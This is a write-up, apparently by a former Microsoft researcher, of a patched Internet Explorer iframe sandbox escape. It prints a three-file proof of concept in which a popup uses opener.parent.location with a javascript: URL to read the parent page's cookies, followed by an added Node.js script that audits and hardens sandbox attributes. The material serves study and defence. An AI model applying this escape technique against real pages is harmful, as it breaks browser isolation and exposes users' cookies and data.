With both allow-scripts and ms-allow-popups set, a sandboxed iframe could open a new window and then use that window’s opener.parent.location to execute JavaScript in the parent’s context — completely bypassing the sandbox.
<!-- parent page -->
<iframe sandbox="allow-scripts ms-allow-popups" src="sandboxed.html"></iframe>
<script>
document.cookie = "COOKIE WAS SET BY THE TOP WINDOW";
</script>
<!-- sandboxed.html -->
<script>
window.open("sandboxbreaker.html");
</script>
<!-- sandboxbreaker.html (new window, no sandbox) -->
<script>
opener.parent.location = 'javascript:alert(document.cookie)';
</script>
The new window opened by the sandboxed frame was not itself sandboxed. From there, accessing opener.parent gave a reference to the parent of the sandboxed frame, and assigning a javascript: URL to its location executed code in that frame’s context. Cookies, DOM content, and other restricted resources became accessible.
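As an added defensive example (not code from the original post): a small Node.js audit that scans the iframes in an HTML string and flags sandbox attribute combinations that give a sandboxed frame an unsandboxed popup with an opener back to the embedder. The token names are real; the legacy ms-allow-popups token comes from the post, and allow-popups-to-escape-sandbox is its standardized equivalent, so the check goes slightly beyond the IE-specific case above. The sample page embedded in the block is constructed for this example.

```javascript
// Added example, not code from the original post: audit the sandbox attribute
// of every <iframe> in an HTML string and flag combinations that give a
// sandboxed frame an unsandboxed window with an opener back to the embedder.
// Token names are real (HTML spec and the legacy IE ms- prefix); the sample
// page below is constructed for this example.

// With allow-scripts, either of these tokens lets window.open() produce a
// popup that is NOT sandboxed. The legacy IE token is the one from the post;
// allow-popups-to-escape-sandbox is the standardized equivalent.
const POPUP_ESCAPE_TOKENS = new Set([
  "ms-allow-popups",
  "allow-popups-to-escape-sandbox",
]);

// Return an array of attribute maps, one per <iframe ...> start tag.
function parseIframes(html) {
  const frames = [];
  const tagRe = /<iframe\b([^>]*)>/gi;
  const attrRe = /([a-zA-Z-]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
  let tag;
  while ((tag = tagRe.exec(html)) !== null) {
    const attrs = {};
    let m;
    while ((m = attrRe.exec(tag[1])) !== null) {
      // A bare attribute (sandbox with no value) yields the empty string.
      attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4] ?? "";
    }
    frames.push(attrs);
  }
  return frames;
}

// Split a sandbox attribute value into its lower-cased token set.
function sandboxTokens(value) {
  return new Set(value.toLowerCase().split(/\s+/).filter(Boolean));
}

// Rate one iframe's attributes: "none" (no sandbox), "high", "low" or "ok".
function assessIframe(attrs) {
  if (!("sandbox" in attrs)) {
    return { level: "none", reason: "no sandbox attribute" };
  }
  const tokens = sandboxTokens(attrs.sandbox);
  const scripts = tokens.has("allow-scripts");
  const escape = [...tokens].filter((t) => POPUP_ESCAPE_TOKENS.has(t));
  if (scripts && escape.length > 0) {
    return {
      level: "high",
      reason: `allow-scripts with ${escape.join(", ")}: popups leave the sandbox and keep opener.parent`,
    };
  }
  if (scripts && tokens.has("allow-same-origin")) {
    return {
      level: "high",
      reason: "allow-scripts with allow-same-origin: same-origin content can strip its own sandbox attribute",
    };
  }
  if (tokens.has("allow-popups")) {
    return { level: "low", reason: "allow-popups alone: popups inherit the sandbox flags" };
  }
  return { level: "ok", reason: "no popup escape route" };
}

// Audit every iframe in a page; each finding carries the src for reporting.
function auditIframes(html) {
  return parseIframes(html).map((attrs) => ({ src: attrs.src ?? "", ...assessIframe(attrs) }));
}

// Mitigation: drop the escape tokens so popups (if any) stay sandboxed.
function hardenSandbox(value) {
  return [...sandboxTokens(value)].filter((t) => !POPUP_ESCAPE_TOKENS.has(t)).join(" ");
}

// Constructed sample page: the post's frame plus three variants.
const SAMPLE_HTML = `
<iframe sandbox="allow-scripts ms-allow-popups" src="sandboxed.html"></iframe>
<iframe sandbox="allow-scripts allow-popups" src="widget.html"></iframe>
<iframe sandbox src="static.html"></iframe>
<iframe src="legacy.html"></iframe>
`;

for (const f of auditIframes(SAMPLE_HTML)) {
  console.log(`${f.level.padEnd(4)} ${f.src}: ${f.reason}`);
}
```

Run it with node; the first frame (the post's attribute value) is reported as high, the plain allow-popups frame as low because the popup inherits the sandbox flags, and hardenSandbox returns the attribute value with the escape token removed.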
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.